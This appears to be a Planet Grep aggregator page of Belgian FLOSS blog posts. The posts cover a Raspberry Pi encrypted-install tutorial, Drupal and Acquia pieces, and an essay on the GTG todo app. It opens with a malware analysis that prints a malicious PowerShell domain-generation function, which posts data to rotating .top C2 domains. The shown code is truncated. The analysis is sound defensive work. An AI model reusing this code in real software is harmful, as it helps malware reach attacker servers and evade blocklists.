Planet Grep

Planet'ing Belgian FLOSS people

Planet Grep is maintained by Wouter Verhelst. All times are in UTC.

July 14, 2020

DGA (“Domain Generation Algorithm“) is a technique implemented in some malware families to defeat defenders and to make the generation of IOC’s (and their usage – example to implement black lists) more difficult. When a piece of malware has to contact a C2 server, it uses domain names or IP addresses. Once the malicious code analyzed, it’s easy to build the list of domains/IP used and to ask the network team to block access to these network resources. With a DGA, the list of domain names is generated based on some criterias and the attacker has just to register the newly generated domain to move the C2 infrastructure somewhere else… This is a great cat & mouse game!

I found a malicious PowerShell script that implements a simple DGA. Here is the code:

function xfyucaesbv( $etdtyefbg ){
  $ubezabcvwd = "";
  "ge","6h","sp","FT","4H","fW","mP" | %{ $ubezabcvwd += ","+"http://"+ ( [Convert]::ToBase64String(   [System.Text.Encoding]::UTF8.GetBytes( $_+ $(Get-Date -UFormat "%y%m%V") ) ).toLower() ) +".top/"; };
  $ubezabcvwd.split(",") | %{
    if( !$myurlpost ) {
      $myurlpost = $_ -replace "=", "";
      if(!(sendpost2($etdtyefbg + "&domen=$myurlpost"))) {   
        $myurlpost = $false;
      Start-Sleep -s 5;
  if( $etdtyefbg -match "status=register" ){
    return "ok";
  } else {
    return $myurlpost;

The most interesting line is this one:

PS C:\Users\REM> "ge","6h","sp","FT","4H","fW","mP" | %{ $ubezabcvwd += ","+"http://"+ ( [Convert]::ToBase64String( [System.Text.Encoding]::UTF8.GetBytes( $_+ $(Get-Date -UFormat "%y%m%V") ) ).toLower() ) +".top/"; };

The first hostname is hardcoded but others are generated by a concatenation of one string (out of the array) with a timestamp. The string is Base64 encoded and padding is removed if present. Example:

base64("ge" + "200729") = "z2uymda3mjk="

The fact that the timestamps is based on ‘%v’ (which indicates the number of the current week (0-51) is a good indicator of a DGA. One domain will be generated every week.

I tried to resolve the domain names from the list above but none of them is registered right now. I generated domains for the next two months and I’ve added them to my hunting rules:

I’ll keep an eye on them!

[The post Simple DGA Spotted in a Malicious PowerShell has been first published on /dev/random]

Today, Acquia announced the launch of its Open Digital Experience Platform, a single platform to build websites and applications, and run data-driven marketing campaigns across channels. As a part of the launch, I wrote a piece for Digiday on the impact COVID-19 is having on digital transformation. Even though many organizations are under pressure to rapidly transition their operations online, the changes they make now can have a positive impact for years to come. Below is the full text of the article.

Over the past few years, we've seen rapid innovation in many parts of the consumer world. Brands build pop-up stores overnight to test new retail, product, and marketing concepts. The same thing is happening digitally, driven by COVID-19. Businesses need to operate on compressed timelines, and "pop-up" new digital-first businesses (or as TechCrunch calls it, a flash digital transformation.)

In the past, these efforts would have taken years. This period of rapid change has certainly been difficult for many organizations. However, many of the changes organizations have made in the first half of this year will have a big impact for years to come.

One example of a brand that adapted its digital strategy due to COVID-19 is King Arthur Flour, the oldest flour company in America. The pandemic resulted in a surge of people baking at home. No longer able to rely on brick-and-mortar sales, King Arthur Flour's digital team drove demand online. They published new celebrity baking series and other creative, relevant content on their site. As a result, their sales increased 200 percent year-over-year, and website sessions spiked by 260 percent.

Other brands can be just as successful at flash transformation if they keep an eye on the three biggest trends driving it.

Trend 1: Experience wins, and requires intelligent use of data

Both a taxi and an Uber or Lyft can get you from point A to B. At the core, they are the same product. But in practice, the Uber or Lyft experience wins — at least in Boston where I live and taxis are notoriously bad.

Both Uber and Lyft rely on technology to deliver a superior customer experience. Every aspect of their customer experience is personalized, including their mobile applications, emails, text messages, safety features, and more.

For years, the promise of a personalized customer experience has remained elusive, only available to those who can make large engineering investments (like Uber or Lyft). Today, any organization can deliver great technology-driven customer experiences. Open Source has democratized the building of those. However, personalization remains hard. It requires that organizations get a handle on their customer data, which isn't an easy task and not something that is solved by Open Source.

Only when you use data to understand your customers' preferences and intentions can you deliver a truly relevant experience. In difficult economic times, relevant experiences help businesses stand out and drive much-needed sales.

Trend 2: The rise of the technical marketer

As such, marketers have become more reliant on technology to drive customer experiences. Twenty years ago, a web content management system was a stand-alone application run by IT. Today, content management is deeply integrated in the marketing technology stack and primarily operated by marketing.

It's not unusual for an ambitious website to have five or more connections into other systems. Marketing technology expert Scott Brinker counted over 8,000 marketing technology vendors in 2020, a 13.6 percent increase over 2019.

A technical marketer knows how to navigate this landscape to choose the best tools for their organization. For technical marketers, it's essential to have the right platform to integrate the tools and data sources needed to optimize their customers' experiences. The rise of that technical marketer has enabled a new relationship and partnership between marketing and IT.

Trend 3: Openness

Until recently, the idea of "open" technology was a hard sell to marketers. On the other hand, developers have embraced open APIs, Open Source, and connectors for years.

More and more, marketers find themselves road-blocked by closed systems. When a marketing automation system can't talk to other data sources, it can be impossible to implement effective personalization. When an email marketing tool only draws upon the data contained within its own system, it misses out on the data that is collected by a separate web analytics tool. Examples of these types of silos across the traditional marketing stack abound.

Without the ability to integrate different marketing tools and the data contained within them, customer experiences will continue to be disjointed and far from personal. In fact, research shows that 60 percent of customers are frustrated with brands' ability to predict their needs, and think they aren't doing an effective job of using personalization. To address these frustrations, openness and interconnectivity between technologies needs to become a marketing must-have, instead of a nice-to-have.

A new age of resilience

It's been impressive to see how resilient organizations and people have been at adapting so rapidly. This adaptation has been essential to business survival. Fortunately, the changes made under pressure could be the key to succeeding as more of the world becomes permanently digital, enabling the kinds of digital transformations that organizations have been yearning for for years.

July 12, 2020

The Raspberry PI has become more and more powerful in the recent years, maybe too powerful to be a “maker board”. The higher CPU power and availability of more memory - up to 8GB - makes it more suitable for home server usage.

The latest firmware (EEPROM) enables booting from a USB device. To enable USB boot the EEPROM on the raspberry needs to be updated to the latest version and the bootloader that comes with the operating system - the start*.elf, etc files on the boot filesystem - needs to support it.

I always try to use filesystem encryption. You’ll find my journey to install GNU/Linux on an encrypted filesystem below.

64 Bits operating systems

The Raspberry PI 4 has a 64 bits CPU, the default operating system - Raspberry Pi OS (previously called Raspbian) - for the Rasberry PI is still 32 bits to take full advantage of the 64bits CPU a 64 bits operating system is required.

You’ll find an overview GNU/Linux distributions for RPI4 below.

  • Raspberry PI OS

    Raspberry PI OS is the default operating system for the Raspberry Pi. The operating system is 32 bits.

    There is a beta version available with 64 bits support available.

  • Ubuntu

    Ubuntu for the raspberry pi has 64 bits support. But boot process isn’t fully compatible with USB boot. The bootloader isn’t up-to-date enough to support it and the u-boot loader isn’t yet updated to support USB boot.

  • Kali Linux

    Kali Linux is another 64 bits operation system for the Raspberry Pi. The bootloader isn’t updated enough to support USB boot.

  • Arch Linux ARM

    Arch Linux ARM has an install image for the Raspberry PI 4 the default install image is still 32 bits. Arch Linux ARM has 64 bits support so you could build you own image with the 64bits packages and a custom kernel.

  • Manjaro

    Manjaro is based on Arch Linux and has 64 bits support for the raspberry pi. Manjaro is a rolling distribution the boot loader is up to date enough to support USB boot.

  • Other

    The list above are the GNU/Linux distributions that I considered for my Raspberry Pi 4. There are - as always - other options. The distributions that don’t support booting from a USB device will probably support it soon.

I was looking for a GNU/Linux distribution with 64 bits support and USB boot support and went with Manjaro.

The installation process to install Manjaro on an encrypted filesystem is similar to the installation on an x84_64 system running Archlinux. See my previous blog posts: Install Arch on an encrypted btrfs partition and Install Parabola GNU/Linux on an Encrypted btrfs logical volume.

USB boot

To enable the raspberry pi 4 to boot from USB, you need to update your firmware. The boot loader also needs to be updated to enable booting from a USB device.

Get the latest firmware

Manjaro didn’t include the latest stable firmware to enable USB boot, so I used the 64 bits beta Raspberry PI OS to update the firmware.

Update Raspberry PI OS to get the latest firmware.

pi@raspberrypi:~ $ sudo apt-get update
Hit:1 buster InRelease
Hit:2 buster InRelease
Hit:3 buster/updates InRelease
Hit:4 buster-updates InRelease
Reading package lists... Done
pi@raspberrypi:~ $ sudo apt-get full-upgrade
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Calculating upgrade... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
pi@raspberrypi:~ $ 

Verify that the latest firmware is available.

The latest stable bootloader is located at /lib/firmware/raspberrypi/bootloader/stable.

pi@raspberrypi:~ $ cd /lib/firmware/raspberrypi/
pi@raspberrypi:/lib/firmware/raspberrypi $ ls
pi@raspberrypi:/lib/firmware/raspberrypi $ cd bootloader/stable/
pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ 

Verify that the pieeprom > 2020-06-xx is available.

pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ ls -l
total 1220
-rw-r--r-- 1 root root 524288 Apr 23 17:53 pieeprom-2020-04-16.bin
-rw-r--r-- 1 root root 524288 Jun 17 11:15 pieeprom-2020-06-15.bin
-rw-r--r-- 1 root root  98148 Jun 17 11:15 recovery.bin
-rw-r--r-- 1 root root  98904 Feb 28 15:41 vl805-000137ad.bin
pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ 

Get the current version

Execute vcgencmd bootloader_version to get the current firmware version.

Please note that I already updated the firmware in the output below.

pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ vcgencmd bootloader_version
Jun 15 2020 14:36:19
version c302dea096cc79f102cec12aeeb51abf392bd781 (release)
timestamp 1592228179


pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ sudo rpi-eeprom-update -d -f  ./pieeprom-2020-06-15.bin
BCM2711 detected
VL805 firmware in bootloader EEPROM
BOOTFS /boot
*** INSTALLING ./pieeprom-2020-06-15.bin  ***
BOOTFS /boot
EEPROM update pending. Please reboot to apply the update.
pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ 


pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ sudo reboot

Verify the version again.

pi@raspberrypi:~ $ vcgencmd bootloader_version
Jun 15 2020 14:36:19
version c302dea096cc79f102cec12aeeb51abf392bd781 (release)
timestamp 1592228179
pi@raspberrypi:~ $ 

The Raspberry PI is ready to boot from USB.

Install Manjaro on an encrypted filesystem

Manjaro will run an install script after the RPI is booted to complete the installion.

  • We have two options boot the pi from the standard non-encrypted image and extract/move it to an encrypted filesystem.
  • Extract the installation image and move the content to an encrypted filesystem.

You’ll find my journey of the second option below. The host system to extract/install the image is an x86_64 system running Archlinux.

Download and copy

Download and verify the Manjaro image from:

Copy the image to keep the original intact.

[root@vicky manjaro]# cp Manjaro-ARM-xfce-rpi4-20.06.img image

Create tarball

Verify the image

Verify the image layout with fdisk -l.

[root@vicky manjaro]# fdisk -l image
Disk image: 4.69 GiB, 5017436160 bytes, 9799680 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x090a113e

Device     Boot  Start     End Sectors   Size Id Type
image1           62500  500000  437501 213.6M  c W95 FAT32 (LBA)
image2          500001 9799679 9299679   4.4G 83 Linux
[root@vicky manjaro]# 

We’ll use kpartx to map the partitions in the image so we can mount them. kpartx is part of the multipath-tools.

Map the partitions in the image with kpartx -ax, the “-a” option add the image, “-v” makes it verbose so we can see where the partitions are mapped to.

[root@vicky manjaro]# kpartx -av image
add map loop1p1 (254:10): 0 437501 linear 7:1 62500
add map loop1p2 (254:11): 0 9299679 linear 7:1 500001
[root@vicky manjaro]#

Create the destination directory.

[root@vicky manjaro]# mkdir /mnt/chroot

Mount the partitions.

[root@vicky manjaro]# mount /dev/mapper/loop1p2 /mnt/chroot
[root@vicky manjaro]# mount /dev/mapper/loop1p1 /mnt/chroot/boot
[root@vicky manjaro]#

Create the tarball.

[root@vicky manjaro]# cd /mnt/chroot/
[root@vicky chroot]# tar czvpf /home/staf/Downloads/isos/manjaro/Manjaro-ARM-xfce-rpi4-20.06.tgz .


[root@vicky ~]# umount /mnt/chroot/boot 
[root@vicky ~]# umount /mnt/chroot
[root@vicky ~]# cd /home/staf/Downloads/isos/manjaro/
[root@vicky manjaro]# kpartx -d image
loop deleted : /dev/loop1
[root@vicky manjaro]# 

Partition and create filesystems


Partition your harddisk delete all partitions if there are partition on the harddisk.

I’ll create 3 partitions on my harddisk

  • boot partitions of 500MB (Type c ‘W95 FAT32 (LBA)’
  • root partitions of 50G
  • rest
[root@vicky ~]# fdisk /dev/sdh

Welcome to fdisk (util-linux 2.35.2).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.

Device does not contain a recognized partition table.
Created a new DOS disklabel with disk identifier 0x49887ce7.

Command (m for help): n
Partition type
   p   primary (0 primary, 0 extended, 4 free)
   e   extended (container for logical partitions)
Select (default p): p
Partition number (1-4, default 1): 
First sector (2048-976773167, default 2048): 
Last sector, +/-sectors or +/-size{K,M,G,T,P} (2048-976773167, default 976773167): +500M

Created a new partition 1 of type 'Linux' and of size 500 MiB.

Command (m for help): n
Partition type
   p   primary (1 primary, 0 extended, 3 free)
   e   extended (container for logical partitions)
Select (default p): p
Partition number (2-4, default 2): 2
First sector (1026048-976773167, default 1026048): 
Last sector, +/-sectors or +/-size{K,M,G,T,P} (1026048-976773167, default 976773167): +50G

Created a new partition 2 of type 'Linux' and of size 50 GiB.

Command (m for help): n
Partition type
   p   primary (2 primary, 0 extended, 2 free)
   e   extended (container for logical partitions)
Select (default p): p
Partition number (3,4, default 3): 
First sector (105883648-976773167, default 105883648): 
Last sector, +/-sectors or +/-size{K,M,G,T,P} (105883648-976773167, default 976773167): 

Created a new partition 3 of type 'Linux' and of size 415.3 GiB.

Command (m for help): t
Partition number (1-3, default 3): 1
Hex code (type L to list all codes): c

Changed type of partition 'Linux' to 'W95 FAT32 (LBA)'.

The partition table has been altered.
Calling ioctl() to re-read partition table.
Syncing disks.
Command (m for help):  

Create the boot file system

The raspberry pi uses a FAT filesystem for the boot partition.

[root@vicky ~]# mkfs.vfat /dev/sdh1
mkfs.fat 4.1 (2017-01-24)
[root@vicky ~]# 

Create the root filesystem

Overwrite the root partition with random data

Because we are creating an encrypted filesystem it’s a good idea to overwrite it with random data. We’ll use badblocks for this. Another method is to use “dd if=/dev/random of=/dev/xxx”, the “dd” method is probably the best method but is a lot slower.

[root@vicky ~]# badblocks -c 10240 -s -w -t random -v /dev/sdh2
Checking for bad blocks in read-write mode
From block 0 to 52428799
Testing with random pattern: done                                                 
Reading and comparing: done                                                 
Pass completed, 0 bad blocks found. (0/0/0 errors)
[root@vicky ~]# 

Encrypt the root filesystem


I booted the RPI4 from a sdcard to verify the encryption speed by executing the cryptsetup benchmark.

[root@minerva ~]# cryptsetup benchmark
# Tests are approximate using memory only (no storage IO).
PBKDF2-sha1       398395 iterations per second for 256-bit key
PBKDF2-sha256     641723 iterations per second for 256-bit key
PBKDF2-sha512     501231 iterations per second for 256-bit key
PBKDF2-ripemd160  330156 iterations per second for 256-bit key
PBKDF2-whirlpool  124356 iterations per second for 256-bit key
argon2i       4 iterations, 319214 memory, 4 parallel threads (CPUs) for 256-bit key (requested 2000 ms time)
argon2id      4 iterations, 321984 memory, 4 parallel threads (CPUs) for 256-bit key (requested 2000 ms time)
#     Algorithm |       Key |      Encryption |      Decryption
        aes-cbc        128b        23.8 MiB/s        77.7 MiB/s
    serpent-cbc        128b               N/A               N/A
    twofish-cbc        128b        55.8 MiB/s        56.2 MiB/s
        aes-cbc        256b        17.4 MiB/s        58.9 MiB/s
    serpent-cbc        256b               N/A               N/A
    twofish-cbc        256b        55.8 MiB/s        56.1 MiB/s
        aes-xts        256b        85.0 MiB/s        74.9 MiB/s
    serpent-xts        256b               N/A               N/A
    twofish-xts        256b        61.1 MiB/s        60.4 MiB/s
        aes-xts        512b        65.4 MiB/s        57.4 MiB/s
    serpent-xts        512b               N/A               N/A
    twofish-xts        512b        61.3 MiB/s        60.3 MiB/s
[root@minerva ~]# 
Create the Luks volume

The aes-xts cipher seems to have the best performance on the RPI4.

[root@vicky ~]# cryptsetup luksFormat --cipher aes-xts-plain64 --key-size 256 --hash sha256 --use-random /dev/sdh2

This will overwrite data on /dev/sdh2 irrevocably.

Are you sure? (Type 'yes' in capital letters): YES
Enter passphrase for /dev/sdh2: 
Verify passphrase: 
WARNING: Locking directory /run/cryptsetup is missing!
[root@vicky ~]# 
Open the Luks volume
[root@vicky ~]# cryptsetup luksOpen /dev/sdh2 cryptroot
Enter passphrase for /dev/sdh2: 
[root@vicky ~]# 

Create the root filesystem

[root@vicky ~]# mkfs.ext4 /dev/mapper/cryptroot
mke2fs 1.45.6 (20-Mar-2020)
Creating filesystem with 13103104 4k blocks and 3276800 inodes
Filesystem UUID: 557677f1-9705-4beb-8c8b-e36c552730f3
Superblock backups stored on blocks: 
	32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208, 
	4096000, 7962624, 11239424

Allocating group tables: done                            
Writing inode tables: done                            
Creating journal (65536 blocks): done
Writing superblocks and filesystem accounting information: done   

[root@vicky ~]# 

Mount and extract

Mount the root filesystem.

[root@vicky ~]# mount /dev/mapper/cryptroot /mnt/chroot
[root@vicky ~]# mkdir -p /mnt/chroot/boot
[root@vicky ~]# mount /dev/sdh1 /mnt/chroot/boot
[root@vicky ~]# 

And extract the tarball.

[root@vicky manjaro]# cd /home/staf/Downloads/isos/manjaro/
[root@vicky manjaro]# tar xzvf Manjaro-ARM-xfce-rpi4-20.06.tgz -C /mnt/chroot/
[root@vicky manjaro]# sync


To continue the setup we need to boot or chroot into the operating system. It possible to run ARM64 code on a x86_64 system with qemu - qemu will emulate an arm64 CPU -.

Install qemu-arm-static

Install the qemu-arm package. It not in the main Archlinux distribution but it’s available as a AUR.

[staf@vicky ~]$ yay -S qemu-arm-static 

copy qemu-arm-static

Copy the qemu-arm-static into the chroot.

[root@vicky manjaro]# cp /usr/bin/qemu-arm-static /mnt/chroot/usr/bin/
[root@vicky manjaro]# 

mount proc & co

To be able to run programs in the chroot we need the proc, sys and dev filesystems mapped into the chroot.

[root@vicky ~]# mount -t proc none /mnt/chroot/proc
[root@vicky ~]# mount -t sysfs none /mnt/chroot/sys
[root@vicky ~]# mount -o bind /dev /mnt/chroot/dev
[root@vicky ~]# mount -o bind /dev/pts /mnt/chroot/dev/pts
[root@vicky ~]# 


Chroot into ARM64 installation.

LANG=C chroot /mnt/chroot/

Set the PATH.

[root@vicky /]# export PATH=/sbin:/bin:/usr/sbin:/usr/bin

And verify that we are running aarch64.

[root@vicky /]# uname -a
Linux vicky 5.6.19.a-1-hardened #1 SMP PREEMPT Sat, 20 Jun 2020 15:16:50 +0000 aarch64 GNU/Linux
[root@vicky /]# 

Update and install vi

Update all packages to the latest version.

[root@vicky /]# pacman -Syu

We need an editor.

root@vicky /]# pacman -S vi
resolving dependencies...
looking for conflicting packages...

Packages (1) vi-1:070224-4

Total Download Size:   0.15 MiB
Total Installed Size:  0.37 MiB

:: Proceed with installation? [Y/n] y
:: Retrieving packages...
 vi-1:070224-4-aarch64                         157.4 KiB  2.56 MiB/s 00:00 [##########################################] 100%
(1/1) checking keys in keyring                                             [##########################################] 100%
(1/1) checking package integrity                                           [##########################################] 100%
(1/1) loading package files                                                [##########################################] 100%
(1/1) checking for file conflicts                                          [##########################################] 100%
(1/1) checking available disk space                                        [##########################################] 100%
:: Processing package changes...
(1/1) installing vi                                                        [##########################################] 100%
Optional dependencies for vi
    s-nail: used by the preserve command for notification
:: Running post-transaction hooks...
(1/1) Arming ConditionNeedsUpdate...
[root@vicky /]# 



Add encrypt to HOOKS before filesystems in /etc/mkinitcpio.conf.

[root@vicky /]#  vi /etc/mkinitcpio.conf
HOOKS=(base udev autodetect modconf block encrypt filesystems keyboard fsck)

Create the boot image

[root@vicky /]# ls -l /etc/mkinitcpio.d/
total 4
-rw-r--r-- 1 root root 246 Jun 11 11:06 linux-rpi4.preset
[root@vicky /]# 
[root@vicky /]# mkinitcpio -p linux-rpi4
==> Building image from preset: /etc/mkinitcpio.d/linux-rpi4.preset: 'default'
  -> -k 4.19.127-1-MANJARO-ARM -c /etc/mkinitcpio.conf -g /boot/initramfs-linux.img
==> Starting build: 4.19.127-1-MANJARO-ARM
  -> Running build hook: [base]
  -> Running build hook: [udev]
  -> Running build hook: [autodetect]
  -> Running build hook: [modconf]
  -> Running build hook: [block]
  -> Running build hook: [encrypt]
==> ERROR: module not found: `dm_integrity'
  -> Running build hook: [filesystems]
  -> Running build hook: [keyboard]
  -> Running build hook: [fsck]
==> Generating module dependencies
==> Creating gzip-compressed initcpio image: /boot/initramfs-linux.img
==> WARNING: errors were encountered during the build. The image may not be complete.
[root@vicky /]#

update boot settings…

Get the UUID for the boot and the root partition.

[root@vicky boot]# ls -l /dev/disk/by-uuid/ | grep -i sdh
lrwxrwxrwx 1 root root 12 Jul  8 11:42 xxxx-xxxx -> ../../sdh1
lrwxrwxrwx 1 root root 12 Jul  8 12:44 xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx -> ../../sdh2
[root@vicky boot]# 

The Raspberry PI uses cmdline.txt to specify the boot options.

[root@vicky ~]# cd /boot
[root@vicky boot]# 
[root@vicky boot]# cp cmdline.txt cmdline.txt_org
[root@vicky boot]# 
cryptdevice=/dev/disk/by-uuid/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx1:cryptroot root=/dev/mapper/cryptroot rw rootwait console=ttyAMA0,115200 console=t
ty1 selinux=0 plymouth.enable=0 smsc95xx.turbo_mode=N dwc_otg.lpm_enable=0 kgdboc=ttyAMA0,115200 elevator=noop snd-bcm2835.enable_compat


[root@vicky etc]# cp fstab fstab_org
[root@vicky etc]# vi fstab
[root@vicky etc]# 
# Static information about the filesystems.
# See fstab(5) for details.

# <file system> <dir> <type> <options> <dump> <pass>
UUID=xxxx-xxxx  /boot   vfat    defaults        0       0

Finish your setup

Set the root password.

[root@vicky etc]# passwd

Set the timezone.

[root@vicky etc]# ln -s /usr/share/zoneinfo/Europe/Brussels /etc/localtime

Generate the required locales.

[root@vicky etc]# vi /etc/locale.gen 
[root@vicky etc]# locale-gen

Set the hostname.

[root@vicky etc]# vi /etc/hostname

clean up

Exit chroot

[root@vicky etc]# exit
[root@vicky ~]# uname -a
Linux vicky 5.6.19.a-1-hardened #1 SMP PREEMPT Sat, 20 Jun 2020 15:16:50 +0000 x86_64 GNU/Linux
[root@vicky ~]# 

Make sure that there are no processes still running from the chroot.

[root@vicky ~]# ps aux | grep -i qemu
root      160666  0.0  0.1 323228 35468 ?        Ssl  16:50   0:00 /usr/bin/qemu-aarch64-static /usr/bin/gpg-agent --homedir /etc/pacman.d/gnupg --use-standard-socket --daemon
root      203274  0.0  0.0   6812  2188 pts/1    S+   17:14   0:00 grep -i qemu
[root@vicky ~]# 

Kill the processes from the chroot.

[root@vicky ~]# kill 160666
[root@vicky ~]# 

Umount the chroot filesystems.

[root@vicky manjaro]# mount | grep -i chroot | awk '{print $3}'
[root@vicky manjaro]# 
[root@vicky manjaro]#  mount | grep -i chroot | awk '{print $3}' | xargs -n1 umount 
umount: /mnt/chroot: target is busy.
umount: /mnt/chroot/dev: target is busy.
[root@vicky manjaro]#  mount | grep -i chroot | awk '{print $3}' | xargs -n1 umount 
umount: /mnt/chroot: target is busy.
[root@vicky manjaro]#  mount | grep -i chroot | awk '{print $3}' | xargs -n1 umount 
[root@vicky manjaro]# 

Close the luks volume…

[root@vicky ~]# cryptsetup luksClose cryptroot
[root@vicky ~]# sync
[root@vicky ~]# 


Connect the usb disk to the raspberry pi and power it on. If you are lucky the PI will boot from the USB device and ask you to type the password to decrypt the root filesystem.

Have fun!


July 10, 2020

I remember the first gathering of Drupal contributors back in 2005. At the time, there were less than 50 people in attendance. In the 15 years since that first gathering, DrupalCon has become the heartbeat of the Drupal community. With each new DrupalCon, we introduce new people to our community, demonstrate the best that Drupal has to offer, and reconnect with our Drupal family.

Next week's DrupalCon Global is going to be no different.

Because of COVID-19, it is the first DrupalCon that will be 100% virtual. But as much as we may miss seeing each other in person, the switch to virtual has opened opportunities to bring in speakers and attendees who never would have been able to attend otherwise.

There are a few moments I'm particularly excited about:

  • Mitchell Baker, CEO and Chair of the Mozilla Foundation, is joining us to talk about the future of the Open Web, and the importance of Open Source software.
  • Jacqueline Gibson, Digital Equity Advocate and Software Engineer from Microsoft, will be talking about Digital Inequity for the Black community – a topic I believe is deeply important for our community and the world.
  • Leaders of current Drupal strategic initiatives will be presenting their progress and their calls for action to keep Drupal the leading CMS on the web.
  • And of course, I'll be giving my keynote presentation to celebrate the community's accomplishment in releasing Drupal 9, and to talk about Drupal's future.

Beyond the sessions, I look forward to the human element of the conference. The side conversations and reunions with old friends make attending DrupalCon so much more powerful than simply watching the recordings after the fact. I hope to see you at DrupalCon Global next week!

July 09, 2020

In the last two weeks, Peter Zaitsev published a 4-part series on measuring Linux performance on this blog.

July 08, 2020

This post is the last part in a four-part blog series by Peter Zaitsev, Percona Chief Executive Officer.

July 07, 2020

How a broken screen kicked me out of developing an Open Source software and how the community revived it 6 years later

When I discovered the FLOSS world, at the dawn of this century, I thought developers were superheroes. Sort of semi-gods that achieved everything I wanted to do with my life like having their face displayed on, their name on the Wikipedia page describing their software or launching a free software company sold for millions. (Spoiler: I didn’t achieve the latter.) I was excited like a groupie when I could have a casual chat with Federico Mena Quintero or hang out with Michael Meeks.

I never understood why some successful developers suddenly disappeared and left their software un-maintained. I was shocked that some of them started to contribute to proprietary software. They had everything!

Without surprise, I followed that exact same path myself a few years later, without premeditation. All it took was for my laptop’s screen to break while I was giving a conference about, note the irony, Free Software.

But let’s tell things in order.

Starting a FLOSS project

As a young R&D engineer in my mid-twenties, I quickly discovered the need for an organisational system in order to get things done. Inspired by the Getting Things Done book, I designed my own system but found no software to implement it properly. Most todo software was either too simplistic (useful only for groceries) or too complex (entering a task required to fill tenth of fields in an awful interface). To some extent, this is still the case today. No software managed to be simple and yet powerful, allowing you to take notes with your todos, to have a start date before which it would make no sense to work on the task or to have dependencies between tasks.

I decided to write my own software and convinced my lifelong friend Bertrand to join me. In the summer of 2009, we spent several days in his room drawing mockups on a white board. We wanted to get the UX right before any coding.

Long story short: it looks like we did the right choices and the Getting Things GNOME! (yep, that was the name) quickly became popular. It was regularly cited in multiple Top 10 Ubuntu apps, widely popular in the Ubuntu app store. We even had many non-Linux users trying to port it to Windows because there was no equivalent. For the next four years, I would spend my nights coding, refactoring, developing and creating a community.

The project started to attract lots of contributors and some of them, like Izidor and Parin, became friends. It was a beautiful experience. Last but not least, I switched to a day job which involved managing free software development with a team of rock stars developers. I was literally paid to attend FOSDEM or GUADEC and to work with colleagues I appreciated. And, yes, my head was on planet.gnome and GTG had its own Wikipedia page.

The great stall

Unfortunately, 2014 started with a lay-off at Lanedo, the company I was working for. I started being involved in the local startup scene. I was also giving conferences about Free Software. During one, the screen of my laptop suddenly stopped working. I was able to finish because of the projector, but my laptop was now requiring an external screen.

Being broke and jobless, I bought the cheaper laptop I could find. A Chromebook. With the Chromebook, I started investigating web services.

This is perhaps one of my biggest regrets: not having developed GTG as a webapp. If I had, things would probably have been very different. But I didn’t like web development. And still don’t like it today. In the end, it was not possible to code for GTG on the Chromebook.

After a few months, I landed a job at Elium. My friend and CEO Antoine convinced me to try a company Macbook instead of a Linux laptop. I agreed to do the test and started to dive into the Apple world.

I never found a Todo app that was as good as GTG so I started to try every new shiny (and expensive) thing. I used Evernote, Todoist, Things and many other. I wanted to be productive on my Mac. The Mac App Store helped by showering me in recommendations and new arrivals of fantastic productivity apps.

I didn’t want to acknowledge it but, in fact, I had suddenly abandoned GTG. I didn’t even have a working Linux computer.

I was not worried because there were many very skilled and motivated contributors, the main one being Izidor. What I didn’t imagine at the time was that Izidor went from being a bored student to a full-time Google employee with a real life outside free software.

A Free Software project needs more than developers. There’s a strong need for a « community animator ». Someone who will take decisions, who will communicate and be the heartbeat of the project. It’s a role often forgotten when done by the lead dev. I always was the main animator behind GTG, even at times when I was writing less code than other contributors. Something I didn’t realise at the time.

And while I spent 6 years exploring productivity on a Mac, GTG entered hibernation.


Users were not happy. Especially one : Jeff, who was also a community contributor and is an open source expert. In 2019, he decided to get GTG back from the grave. Spoiler: he managed to do it. He became the heartbeat of GTG while a talented and motivated developer showed up to his call: Diego.

They managed to do an incredible amount of work and to release GTG 0.4. Long live to them! Video of GTG 0.4.

I didn’t write any code but helped as I could with my advice and my explanations of the code. It’s a strange feeling to see your own creation continuing in the hands of others. It makes me proud. Creating a software from scratch is hard. But living to see your software being developed by others is quite an accomplishment. I’m proud of what Diego and Jeff are doing. This is something unique to Open Source and I’m grateful to live it.

What is funny is that, at the same time Jeff called for a reboot of GTG, I went back to Linux, tired of all the bells and whistles of Apple. I was looking for simplicity, minimalism. It was also important for me to listen again to my moral values. I was missing free software.

In hindsight, I realise how foolish my quest of productivity was. I had spent 6 years developing a software to make me more productive. When I realised that and swore to not develop a productivity software anymore,  I spent the next 6 years trying every new productivity gadget in order to find the perfect combo.

It was enough. Instead of trying to find tools to be productive, I decided to simply do what I always wanted to do. Write.

Changing my perspective led me to the awful realisation that people are not using tools because they are useful but because they are trendy. They rationalise afterward why they use the tool but tools are not made to fill real needs. Needs are, instead, created to justify the use of a fun tool. A few years ago, creating a project was all about « let’s create a Slack about the subject ». Last year it was Notions. This year it’s Airtable. When you have a hammer, everything looks like a nail.

After so many years developing and testing every productivity software out there, I can assure you that the best productivity system should, at the very least, not depend on complex app to access your data. By using Markdown files in a very simple and effective folder structure, I’m able to have the most productive system I ever had. A system that could have worked 12 years ago, a system that does not depend on a company or an open source developer. I don’t even need GTG nor GNOME anymore. I’m now working fully in Zettlr on Regolith with a pen and a Moleskine. I’m now able to focus on a couple of big projects at a time.

Jeff would probably say that I evolved from a chaos warrior to a « goldsmith ». At least for the professional part because I can ensure you the parenting part is still fully on the chaos side. Nevertheless, the dedication of Jeff demonstrated that, with GTG, we created a tool which can become an essential part of chaos warrior’s productivity system. A tool which is useful without being trendy, even years after it was designed. A tool that people still want to use. A tool that they can adapt and modernise.

This is something incredible that can only happen with Open Source.

